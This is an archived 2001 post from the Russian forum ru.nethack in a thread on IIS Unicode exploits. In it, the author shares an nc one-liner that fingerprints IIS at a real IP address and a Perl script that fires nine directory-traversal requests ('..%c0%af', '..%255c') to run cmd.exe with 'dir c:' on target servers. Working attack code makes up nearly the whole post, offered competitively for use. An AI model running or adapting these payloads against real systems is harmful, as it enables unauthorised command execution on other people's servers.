Главная страница


ru.nethack

 
 - RU.NETHACK -------------------------------------------------------------------
 From : Andras                               2:5020/400     07 Jun 2001  16:07:49
 To : All
 Subject : Re: UNICODE exploits
 -------------------------------------------------------------------------------- 
 
 >
 > Да все уже написано:
 > `echo -e "GET / HTTP/1.0\\n" | nc -v -o nc.log trg_host trg_port'
 >
 
 давайте изощраться:
  echo -e "GET / HTTP/1.0\\n\\n" |nc  213.3.169.120 80|grep -c IIS
 возвращает 1 или 0 соответственно если IIS или нет
 
 А этот скрипт в перле проверяет на уникод уязвимость
 #!/usr/bin/perl
 use Socket;
 # --------------init
 if ($#ARGV<0) {die "Usage: unicodecheck IP:port\n";}
 ($host,$port)=split(/:/,@ARGV[0]);
 unless ($port) { $port='80' };
 print "Modified by Loadammo \n";
 print "Testing $host:$port : \n";
 $target = inet_aton($host);
 $flag=0;
 # ---------------test method 1
 #/scripts/..%255c..%255c
 print ".\n";
 my @results=sendraw("GET
 /scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
 \ HTTP/1.0\r\n\r\n");
 foreach $line (@results){
 if ($line =~ /Directory of/) {$flag=1; print "vuln at step 1\n";}}
 # ---------------test method 2
 print ".\n";
 my @results=sendraw("GET
 /scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:
 \ HTTP/1.0\r\n\r\n");
 foreach $line (@results){
 if ($line =~ /Directory of/) {$flag=1; print "vuln at step 2\n";}}
 # ---------------test method 3
 print ".\n";
 my @results=sendraw("GET
 /msadc/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
 HTTP/1.0\r\n\r\n");
 foreach $line (@results){
 if ($line =~ /Directory of/) {$flag=1; print "vuln at step 3\n";}}
 # ---------------test method 4
 print ".\n";
 my @results=sendraw("GET
 /msadc/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
 HTTP/1.0\r\n\r\n");
 foreach $line (@results){
 if ($line =~ /Directory of/) {$flag=1; print "vuln at step 4\n";}}
 # ---------------test method 5
 print ".\n";
 my @results=sendraw("GET
 /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
 \ HTTP/1.0\r\n\r\n");
 foreach $line (@results){
 if ($line =~ /Directory of/) {$flag=1; print "vuln at step 5\n";}}
 # ---------------test method 6
 print ".\n";
 my @results=sendraw("GET
 /cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:
 \ HTTP/1.0\r\n\r\n");
 foreach $line (@results){
 if ($line =~ /Directory of/) {$flag=1; print "vuln at step 6\n";}}
 # ---------------test method 7
 print ".\n";
 my @results=sendraw("GET
 /scripts/..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
 \ HTTP/1.0\r\n\r\n");
 foreach $line (@results){
 if ($line =~ /Directory of/) {$flag=1; print "vuln at step 7\n";}}
 # ---------------test method 8
 print ".\n";
 my @results=sendraw("GET
 /msadc/..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
 HTTP/1.0\r\n\r\n");
 foreach $line (@results){
 if ($line =~ /Directory of/) {$flag=1; print "vuln at step 8\n";}}
 # ---------------test method 9
 print ".\n";
 my @results=sendraw("GET
 /cgi-bin/..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
 \ HTTP/1.0\r\n\r\n");
 foreach $line (@results){
 if ($line =~ /Directory of/) {$flag=1; print "vuln at step 9\n";}}
 
 # ---------------result
 if ($flag==1){print "Vulnerable\n";}
 else {print "Safe\n";}
 # ------------- Sendraw - thanx RFP rfp@wiretrip.net
 sub sendraw { # this saves the whole transaction anyway
 my ($pstr)=@_;
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
 die("Socket problems\n");
 if(connect(S,pack "SnA4x8",2,$port,$target)){
 my @in;
 select(S); $|=1; print $pstr;
 while(<S>){ push @in, $_;}
 select(STDOUT); close(S); return @in;
 } else { die("Can't connect...\n"); }
 }
 КТО ПРЕДЛОЖИТ БОЛЬШЕ ??
 
 Андраш
 --- ifmail v.2.15dev5
  * Origin: MTU-Intel ISP (2:5020/400)
 
 

Вернуться к списку тем, сортированных по: возрастание даты  уменьшение даты  тема  автор 

 Тема:    Автор:    Дата:  
 Re: UNICODE exploits   Vladislav Myasnyankin   06 Jun 2001 22:53:53 
 Re^2: UNICODE exploits   Eugeny Timoshenko   06 Jun 2001 23:00:43 
 Re: UNICODE exploits   Andras   07 Jun 2001 16:07:49 
Архивное /ru.nethack/9104f0063c28.html, оценка 2 из 5, голосов 10
Яндекс.Метрика
Valid HTML 4.01 Transitional